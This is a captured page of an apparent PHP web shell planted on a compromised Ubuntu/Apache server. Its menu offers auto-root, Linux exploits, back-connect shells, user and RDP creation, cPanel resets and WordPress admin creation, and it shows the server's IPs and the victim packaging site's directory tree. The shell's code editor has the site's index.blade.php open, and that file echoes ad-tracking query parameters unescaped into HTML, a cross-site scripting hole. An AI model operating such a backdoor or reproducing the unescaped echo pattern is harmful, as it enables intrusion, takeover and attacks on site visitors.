Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.32
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
boxeswithlogo.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
1.51
KB
-rw-r--r--
beat_my_quote.blade.php
11.62
KB
-rw-r--r--
blogs.blade.php
5.81
KB
-rw-r--r--
category_products.blade.php
31.47
KB
-rw-r--r--
contact_us.blade.php
14.65
KB
-rw-r--r--
dashboard.blade.php
4.07
KB
-rw-r--r--
faqs.blade.php
3.86
KB
-rw-r--r--
index.blade.php
49.56
KB
-rw-r--r--
personalized_packaging_boxes.b...
6.48
KB
-rw-r--r--
portfolio.blade.php
3.11
KB
-rw-r--r--
post.blade.php
1.65
KB
-rw-r--r--
privacy_security.blade.php
1.33
KB
-rw-r--r--
product_detail.blade.php
67.36
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
3.95
KB
-rw-r--r--
sitemap.blade.php
6.82
KB
-rw-r--r--
sitemapxml.blade.php
2.32
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
1.39
KB
-rw-r--r--
test.blade.php
2.38
KB
-rw-r--r--
thank_you.blade.php
2.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.blade.php
@extends('layouts.app') @push('styles') <style> @supports (display: grid) { body, html { display: block; } } .message { border: 1px solid #d2d0d0; padding: 2em; font-size: 1.7vw; box-shadow: -2px 2px 10px 0px rgba(68, 68, 68, 0.4); } @supports (display: grid) { .message { display: none; } } .sections { display: none; } @media screen and (min-width: 768px) { .sections { padding: 4rem; } } @supports (display: grid) { .sections { display: block; } } .grid { display: grid; grid-gap: 30px; grid-template-columns: repeat(auto-fit, minmax(300px, 1fr)); grid-auto-rows: 150px; grid-auto-flow: row dense; } .items { position: relative; display: flex; flex-direction: column; justify-content: flex-end; box-sizing: border-box; background: #0c9a9a; color: #fff; grid-column-start: auto; grid-row-start: auto; color: #fff; background: url("{{asset('assets/images/Layer-13.webp')}}"); background-size: cover; background-position: center; box-shadow: -2px 2px 10px 0px rgba(68, 68, 68, 0.4); transition: transform 0.3s ease-in-out; cursor: pointer; counter-increment: item-counter; } .items:nth-of-type(2n) { background-image: url("{{asset('assets/images/Layer-14.webp')}}"); } .items:nth-of-type(3n) { background-image: url("{{asset('assets/images/Layer-16.webp')}}"); } .items:nth-of-type(4n) { background-image: url("{{asset('assets/images/Layer-17.webp')}}"); } .items:nth-of-type(5n) { background-image: url("{{asset('assets/images/Layer-18.webp')}}"); } .items:nth-of-type(6n) { background-image: url("{{asset('assets/images/Layer-105.webp')}}"); } .items::after { content: ""; position: absolute; width: 100%; height: 100%; opacity: 0.3; transition: opacity 0.3s ease-in-out; } .items:hover { transform: scale(1.05); } .items:hover::after { opacity: 0; } .item--medium { grid-row-end: span 2; } .item--large { grid-row-end: span 3; } .item--full { grid-column-end: auto; } @media screen and (min-width: 768px) { .item--full { grid-column: 1/-1; grid-row-end: span 2; } } .item__details { position: relative; z-index: 1; padding: 15px; color: #000000; background: #fff; font-weight: 700; letter-spacing: 1px; } .item__details::before { font-weight: bold; font-size: 1.1rem; padding-right: 0.5em; color: #444; } </style> <script> let width = screen.width; </script> <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['msclkid'])){ $MSCLKID=$_GET['msclkid']; }else{ $MSCLKID=''; } if(isset($_GET['gad_source'])){ $gad_source=$_GET['gad_source']; }else{ $gad_source=''; } ?> @endpush @section('contents') <section class="banners"> <div class="container-fluid-lg"> <div class="row"> <div class="col-xl-3 col-lg-4 col-sm-6"> <div class="home_bn1 d_none" style=" background-image: url({{asset('assets/images/custom-pillow-packaging-boxes.webp')}}); " > <div class="home-detail"> <span class="theme-color fw-bold">Custom Pillow Boxes</span> <p class="text-content d-md-block d-none"> Perfect for Luxury Packaging. </p> <br> <a href="#" class="shop-button modal-toggle" >Get Quote <i class="fa-solid fa-right-long ms-2"></i ></a> </div> </div> </div> <div class="col-xl-6 col-lg-8 col-sm-12"> <div class="home_bn1" style=" background-image: url({{asset('assets/images/custom-kraft-packaging-boxes.webp')}}); " > <div class="home-detail pad_top"> <span> Personalized<br /> <span> Kraft Packaging Boxes</span> </span> <p class="text-content my-3"> Sturdy Boxes Give Your Products a Natural and Rustic Touch. </p> <a href=""> <button class="shop-button1 modal-toggle"> Get Quote <i class="fa-solid fa-right-long ms-2"></i> </button> </a> </div> </div> </div> <div class="col-xl-3 col-lg-4 col-sm-6"> <div class="home_bn1 d_none d_none1" style=" background-image: url({{asset('assets/images/custom-soap-boxes.webp')}}); " > <div class="home-detail"> <span class="theme-color fw-bold">Custom Pillow Boxes</span> <p class="text-content d-md-block d-none"> Perfect for Luxury Packaging. </p> <br> <a href="#" class="shop-button modal-toggle" >Get Quote <i class="fa-solid fa-right-long ms-2"></i ></a> </div> </div> </div> </div> </div> </section> <section class="banners"> <div class="container-fluid-lg"> <div class="main_box"> <div class="slide_box"> <div class="slide"> <img src="{{asset('assets/images/1.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/2.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/3.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/4.webp')}}" height="80" loading="lazy" width="100" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/5.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/6.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/8.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/2.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/9.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/10.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/1.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/2.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> <div class="slide"> <img src="{{asset('assets/images/3.webp')}}" height="80" width="100" loading="lazy" alt="BoxesWithLogo" /> </div> </div> </div> </div> </section> <section class="bg_light pb-3"> <div class="container-fluid-lg"> <div class="row"> <div class="col-lg-12"> <div class="heading"> <h1 class="text-center mb-2"> Custom Boxes With Logo - Your Reliable Packaging Partner </h1> <p class="text-center"> Deliver amazing unboxing experiences to your customers and boost your brand. Custom Boxes With Logo provides you with top-tier packaging solutions to your business needs. We make your brand shine by providing vibrant and attention-grabbing packaging designs. Being a reputable packaging company in the US, we ensure effortless designing and ordering of remarkable packaging. </p> </div> </div> </div> <div class="row "> <div class="col-lg-2 col-md-4 col-sm-6 col-xs-6"> <div class="sample_boxes"> <img src="{{asset('assets/images/boxeswithlogo-no-die-charges.svg')}}" height="100" width="100" alt="no-die-charges" loading="lazy" /> <span>NO DIE & PLATE CHARGES</span> </div> </div> <div class="col-lg-2 col-md-4 col-sm-6 col-xs-6"> <div class="sample_boxes"> <img src=" {{asset('assets/images/boxeswithlogo-quick-turnaround-time.svg')}}" height="100" width="100" alt="boxeswithlogo-quick-turnaround-time" loading="lazy" /> <span>QUICK TURNAROUND TIME</span> </div> </div> <div class="col-lg-2 col-md-4 col-sm-6 col-xs-6"> <div class="sample_boxes"> <img src="{{asset('assets/images/boxeswithlogo-min-50-boxes.svg')}}" height="100" width="100" alt="boxeswithlogo-min-50-boxes" loading="lazy" /> <span>STARTING FROM 50 BOXES</span> </div> </div> <div class="col-lg-2 col-md-4 col-sm-6 col-xs-6"> <div class="sample_boxes"> <img src="{{asset('assets/images/boxeswithlogo-customize-size-style.svg')}}" height="100" width="100" alt="boxeswithlogo-customize-size-style" loading="lazy" /> <span>CUSTOMIZE SIZE & STYLE</span> </div> </div> <div class="col-lg-2 col-md-4 col-sm-6 col-xs-6"> <div class="sample_boxes"> <img src="{{asset('assets/images/boxeswithlogo-free-graphic-support.svg')}}" height="100" width="100" alt="boxeswithlogo-free-graphic-support" loading="lazy" /> <span>FREE GRAPHIC SUPPORT</span> </div> </div> <div class="col-lg-2 col-md-4 col-sm-6 col-xs-6"> <div class="sample_boxes"> <img src="{{asset('assets/images/boxeswithlogo-free-shipping.svg')}}" height="100" width="100" alt="boxeswithlogo-free-shipping" loading="lazy" /> <span>FREE SHIPPING</span> </div> </div> </div> </div> </section> <section> <div class="container-fluid-lg mb-5"> <div class="row"> <div class="col-lg-9"> <div class="top-selling-box padding_top"> <div class="top-selling-title"> <h2>Top Industries By Demand</h2> </div> </div> <div class="row"> @foreach($products as $fp) <div class="col-lg-4 col-md-6 col-sm-6 col-xs-6 mt-4 wow animate__animated animate__fadeInUp" > <div class="product_box fadeIn"> <div class="product_img"> <a href="{{ url($fp->slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <img class="text-center img-fluid prod_hover" src="{{ asset('assets/categories/'.$fp->category_image) }}" height="260" width="260" loading="lazy" alt="{{$fp->image_alt}}" /> </a> </div> <div class="product_content"> <a href="{{ url($fp->slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <h2>{{$fp->title}}</h2> </a> <a href="{{ url($fp->slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <button class="get_q_btn">Get Quote</button> </a> </div> </div> </div> @endforeach </div> </div> <div class="col-lg-3"> <div class="sticky_element1"> <div class="side_container"> <div class="side_box1 hover-effect" style=" background-image: url({{asset('assets/images/tuck-packaging-boxes.webp')}}); " > <div class="side_details"> <div class="side_content"> <spna class="text-uppercase theme-color fw-500 m-0"> Sustainability </spna> <br> <span class="text-uppercase priority_text"> is Our Top <br /><span class="brand-name"> Priority</span > </span> <p class="text-content fw-500 mt-3 lh-lg"> Eco-friendly boxes for a greener tomorrow </p> <div class="banner-detail-box mb-md-3 mb-1"> <span class="text-uppercase">up to</span> <span class="mt-2 pre">10%</span> <span class="text-uppercase">off</span> </div> <div class="get_box"> <a href="#" class="modal-toggle"> <button class="shop-button1 mt-3"> Get Quote<i class="fa-solid fa-right-long icon ms-2" ></i> </button> </a> </div> </div> </div> </div> <div class="side_box2 mt-3 hover-effect" style=" background-image: url({{asset('assets/images/display-packaging-boxes.webp')}}); " > <div class="side_details"> <div class="side_content"> <span class="text-uppercase theme-color fw-500 m-0"> Affordability </span> <br> <span class="apart-text"> is What <br /><span class="theme-color"> Sets Us Apart</span > </span> {{-- <p class="text-content fw-500 mt-3 lh-lg"> Grow your brand with our economical wholesale boxes! </p>--}} <div> <a href="" class="modal-toggle"> <button class="shop-button1"> Get Quote<i class="fa-solid fa-right-long icon ms-2" ></i> </button> </a> </div> </div> </div> </div> <div class="side_owl mt-5"> <div class="owl_heading"> <h3>Customer Comment</h3> </div> <div class="owl-carousel owl-theme"> @foreach($testimonials as $testimonial) <div class="item "> <div class="d-block w-100"> <div class="card_h rounded-1 my-2"> <p class="pt-2 text_bold"> <?php $comments = strip_tags(substr( $testimonial->comments, 0, 220)); echo $comments.'...'; ?> </h6> </p> <div class="head_1"> <h3> <div class="user_profile"> <?php $zd=explode(' ',$testimonial->client_name)?> {{ strtoupper(mb_substr($zd[0], 0, 1)) }} @if(!empty($zd[1])){{ strtoupper(mb_substr($zd[1], 0, 1) ) }}@endif</div> </h3> <div class="card_n"> <h6>{{$testimonial->client_name}}</h6> <p> <?php $comments = strip_tags(substr( $testimonial->designation, 0, 20)); echo $comments.'...'; ?></p> </div> </div> </div> </div> </div> @endforeach </div> </div> </div> </div> </div> </div> </div> </section> <section class="bg_light"> <div class="container"> <div class="smart_heading" style=" text-align: center; "> <span>Smart Packaging Solution</span> </div> <img src="{{asset('assets/images/smart-packaging-solution.webp')}}" width="1270px" height="329px" loading="lazy" class="img-fluid py-3" alt="BoxesWithLogo" /> </div> </section> <section class="sectionsss container-fluid-lg mb-5"> <div class="text-center my-5 py-2 smart_heading"> <span class="spanquote">Enhance Beauty with Our Finishes </span> <p>Adding elegance to your packaging with our premium finishes</p> </div> <div class="grid"> <div class="items"> <div class="item__details"> Holographic Foiling </div> </div> <div class="items item--large"> <div class="item__details"> Embossing </div> </div> <div class="items item--medium"> <div class="item__details"> Gold Foiling </div> </div> <div class="items item--large"> <div class="item__details"> Spot UV </div> </div> <div class="items item--medium"> <div class="item__details"> Sliver Foiling </div> </div> <div class="items"> <div class="item__details"> Debossing </div> </div> </div> </div> </section> <section class="bg_light"> <div class="container"> <div class="contects_box"> <div class="content_box" id="read_more"> <div class="contents scrollbar" id="style-2"> <div class="force-overflow"> <h2>{!! $page_details->page_heading !!}</h2> {!! $page_details->page_content !!} </div> </div> </div> </div> </div> </section> <section> <div class="container-fluid-lg"> <div class="row"> <div class="col-lg-12"> <div class="top-selling-box padding_top"> <div class="top-selling-title"> <h3>Top Selling Custom Boxes</h3> </div> </div> <div class="row"> @foreach($best_values as $fp) <div class="col-lg-3 col-md-4 col-sm-6 col-xs-6 mt-4 wow animate__animated animate__fadeInUp" > <div class="product_box fadeIn"> <div class="product_img"> <a href="{{ url($fp->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <img class="text-center img-fluid prod_hover" src="{{ asset('assets/products/'.$fp->product_image) }}" height="260" width="260" loading="lazy" alt="{{$fp->product_alt}}" /> </a> </div> <div class="product_content"> <a href="{{ url($fp->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <h5>{{$fp->product_title}}</h5> </a> <a href="{{ url($fp->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <button class="get_q_btn">Get Quote</button> </a> </div> </div> </div> @endforeach </div> </div> </div> </div> </section> <section class="bg_light margin_top"> <div class="container-fluid-lg"> <div class="row padding_y"> <div class="col-lg-7"> <div class="quote_heading"> <h2>Get Custom Quote</h2> </div> @if(!empty(session('error'))) <div class="alert alert-danger"> {{ session('error') }} </div> @endif <form class="bg-white px-4 py-4 rounded-2 shadow" id="get_quote_home" action="{{ route('home_get_quote') }}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>" method="post"> @csrf <div class="row"> <div class="col-md-4 col-sm-6 mt-2"> <label for="inputName" class="form-label">Name</label> <input type="text" class="form-control" id="contact_name" name="contact_name" /> </div> <div class="col-md-4 col-sm-6 mt-2"> <label for="inputEmail4" class="form-label">Email</label> <input type="email" class="form-control" id="contact_email" name="contact_email" /> </div> <div class="col-md-4 col-sm-12 mt-2"> <label for="inputPhone" class="form-label">Phone</label> <input type="text" class="form-control" id="contact_phone" name="contact_phone" /> </div> </div> <div class="row"> <div class="col-md-3 col-4 mt-2"> <label for="Length" class="form-label">Length</label> <input type="text" class="form-control" name="product_length" id="product_length" placeholder="L" /> </div> <div class="col-md-3 col-4 mt-2"> <label for="width" class="form-label">Width</label> <input type="text" class="form-control" name="product_width" id="product_width" placeholder="W" /> </div> <div class="col-md-3 col-4 mt-2"> <label for="Height" class="form-label">Height</label> <input type="text" class="form-control" name="product_depth" id="product_depth" placeholder="H" /> </div> <div class="col-md-3 col-4 mt-2"> <label for="unit" class="form-label">Unit</label> <select id="unit" name="measurement_units" class="form-select"> <option>cm</option> <option>mm</option> <option selected>inch</option> </select> </div> <div class="col-md-6 col-4 mt-2"> <label for="inputQuantity" class="form-label" >Quantity</label > <input type="text" class="form-control" id="inputQuantity" name="quantity" placeholder="Quantity" /> <input type="hidden" name="qtype" value="<?php if($gclid){ echo 'Paid' .'( Google )' ;}elseif($MSCLKID){ echo 'Paid' .'( Bing )' ;}elseif($gad_source){ echo 'Paid' .'( Google )' ;} ?>"> <input type="hidden" required name="<?php if($gclid){ echo 'gclid';} ?><?php if($MSCLKID){ echo 'MSCLKID' ;} ?><?php if($gad_source){ echo 'gad_source' ;} ?>" class="form-control search_input_top" placeholder="Search" value="<?php if($gclid){ echo $gclid ;} ?><?php if($MSCLKID){ echo $MSCLKID ;} ?><?php if($gad_source){ echo $gad_source ;} ?>"> </div> <div class="col-md-6 col-4 mt-2"> <label for="inputcolor" class="form-label" >Select Color</label > <select name="color" id="inputcolor" class="form-control form-select form-select-sm" > <option value="">Select Color</option> <option value="1 Color">1 Color</option> <option value="2 Color">2 Color</option> <option value="3 Color">3 Color</option> <option value="4 Color">4 Color</option> <option value="4/1 Color">4/1 Color</option> <option value="4/2 Color">4/2 Color</option> <option value="4/3 Color">4/3 Color</option> <option value="4/4 Color">4/4 Color</option> </select> </div> <div class="col-md-12 py-1 mt-2"> <div class="form-group"> <label class="mb-2">Description</label> <textarea class="form-control form-control-sm" rows="3" name="message" id="message" placeholder="Describe here..." ></textarea> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="row"> <div class="col-2 mt-2"> <input id="num1_home" class="sum form-control form-control-sm" type="text" name="num1" value="{{rand(1,4)}}" readonly="readonly" /> </div> <div class="col-1 mt-2"> <p class="mt-2">+</p> </div> <div class="col-2 mt-2"> <input id="num2_home" class="sum form-control form-control-sm col-2" type="text" name="num2" value="{{rand(5,9)}}" readonly="readonly" /> </div> <div class="col-1 mt-2"> <p class="mt-2">=</p> </div> <div class="col-2 mt-2"> <input id="home_captchas" class="home_captchas form-control form-control-sm col-2" type="text" name="captcha" maxlength="2" /><br /> </div> <div class="col-lg-4 col-md-12 mt-2"> <span id="spambots">(Are you human?)</span> </div> </div> </div> </div> <div class="col-12 mt-2"> <a href=""> <button type="submit" class="shop-button1">Submit</button> </a> </div> </form> </div> <div class="col-lg-5"> <img src="{{asset('assets/images/get-custom-quote.webp')}}" class="img-fluid quoteimg" loading="lazy" height="684" width="564" alt="boxeswithlogo-get-custom-quote" /> </div> </div> </div> </section> <section> <div class="container-fluid-lg padding_y"> <div class="row"> <div class="col-12"> <div class="faq_head"> <h2>Frequently Asked Questions</h2> </div> </div> </div> <div class="row"> <div class="col-lg-5 d_sm_none"> <img src="{{asset('assets/images/frequently-asked-questions.webp')}}" class="img-fluid faqimg" loading="lazy" alt="boxeswithlogo-frequently-asked-questions" /> </div> <div class="col-lg-6"> <div class="questions"> <div class="colap_box padding_y"> @foreach($faqs as $k=> $s) <div class="box_faq"> <a href="#" class="togglefaq "> {{$s->question}}<i class="icon-plus" ></i ></a> <?php $anss=\App\Models\FaqsAnswer::where('qid',$s->id)->first(); ?> <div class="faqanswer" > <p> {!! $anss['answer'] ??'' !!} </p> </div> </div> @endforeach </div> </div> </div> </div> </div> </section> <section> <div class="container-fluid-lg padding_y"> <div class="row"> <div class="col-lg-12"> <div class="subscrib_bn"> <img src="{{asset('assets/images/subscription-section-image.webp')}}" height="150" width="100%" loading="lazy" alt="CustomBoxeseWithLogo" /> <div class="sub_content"> <span class="text-white" style="font-size: 1.5rem;"> Join Our Newsletter for Promotional Offers and Packaging Insights. </span> <br> <div class="input-box"> <form id="ec-newsletter-form" action="{{ route('subscribe') }}" method="post"> <i class="fa-solid fa-envelope arrow"></i> <input type="email" required="" class="form-control" id="exampleFormControlInput1" name="email" placeholder="Enter Your Email" /> <a href=""> <button class="shop-button2"> Subscribe <i class="fa-solid fa-right-long ms-2"></i> </button> </a> </form> </div> </div> </div> </div> </div> </div> </section> @endsection @push('scripts') <script async src="{{ asset('assets/js/owl.carousel.min.js') }}"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.3/jquery.validate.min.js"></script> <script> const items = document.querySelectorAll('.accordion button'); function toggleAccordion() { const itemToggle = this.getAttribute('aria-expanded'); for (i = 0; i < items.length; i++) { items[i].setAttribute('aria-expanded', 'false'); } if (itemToggle == 'false') { this.setAttribute('aria-expanded', 'true'); } } items.forEach((item) => item.addEventListener('click', toggleAccordion)); const content = document.querySelector(".content-inner"); const contentFull = document.querySelector(".content-full"); const more = document.querySelector(".read-more"); let open = false; if (more) { more.addEventListener("click", (e) => { if (open) { content.removeAttribute("style"); e.target.innerText = "Read more"; open = false; } else { content.style.maxHeight = `${contentFull.clientHeight}px`; e.target.innerText = "Read less"; open = true; } }); } $.validator.addMethod('captcha', function(value) { $result = ( parseInt($('#num1').val()) + parseInt($('#num2').val()) == parseInt($('#captcha').val()) ) ; $('#spambot').fadeOut('fast'); return $result; }, 'Incorrect value, please try again.' ); $('#get_quotes').validate({ debug: false, rules: { captcha: { required: true, },contact_phone: { required: true, }, contact_email: { required: true, }, contact_name: { required: true, } }, chkCaptcha: { required: "* Required" }, highlight: function(element) { $(element).addClass('has-error'); }, unhighlight: function(element) { $(element).removeClass('has-error'); }, errorElement: 'span', errorClass: 'validation-error-message help-block form-helper bold', errorPlacement: function(error, element) { return true; } }); $(document).ready(function() { $.validator.addMethod('home_captchas', function(value) { var result = (parseInt($('#num1_home').val()) + parseInt($('#num2_home').val()) == parseInt($('#home_captchas').val())); $('#spambots').fadeOut('fast'); return result; }, 'Incorrect value, please try again.' ); $('#get_quote_home').validate({ debug: false, rules: { contact_phone: { required: true, }, contact_email: { required: true, email: true // Adding email validation }, contact_name: { required: true, }, home_captchas: { required: true, home_captchas: true } }, highlight: function(element) { $(element).addClass('has-error'); }, unhighlight: function(element) { $(element).removeClass('has-error'); }, errorElement: 'span', errorClass: 'validation-error-message help-block form-helper bold', errorPlacement: function(error, element) { error.insertAfter(element); // Display error message after the element }, submitHandler: function(form) { form.submit(); // Submit the form if validation passes } }); }); var banner=document.getElementById('banner'); const accordionBtns = document.querySelectorAll(".item-header"); accordionBtns.forEach((accordion) => { accordion.onclick = function () { this.classList.toggle("active"); let content = this.nextElementSibling; console.log(content); if (content.style.maxHeight) { //this is if the accordion is open content.style.maxHeight = null; } else { //if the accordion is currently closed content.style.maxHeight = content.scrollHeight + "px"; console.log(content.style.maxHeight); } }; }); function myFunction() { var dots = document.getElementById("dots"); var moreText = document.getElementById("more"); var btnText = document.getElementById("myBtn"); if (dots.style.display === "none") { dots.style.display = "inline"; btnText.innerHTML = "Read more"; moreText.style.display = "none"; } else { dots.style.display = "none"; btnText.innerHTML = "Read less"; moreText.style.display = "inline"; } } </script> <script> $(document).ready(function(){ $(".testimonials .owl-carousel").owlCarousel({ loop:true, margin:10, navigation : false, // Show next and prev buttons slideSpeed : 300, dots: false, lazyLoad : true, autoPlay : true, slideSpeed : 500, nav:false, responsive: { 0: { items: 1, nav: !0 }, 600: { items: 1, nav: !0 }, 1000: { items: 1, nav: true } } }); }); </script> @endpush
Close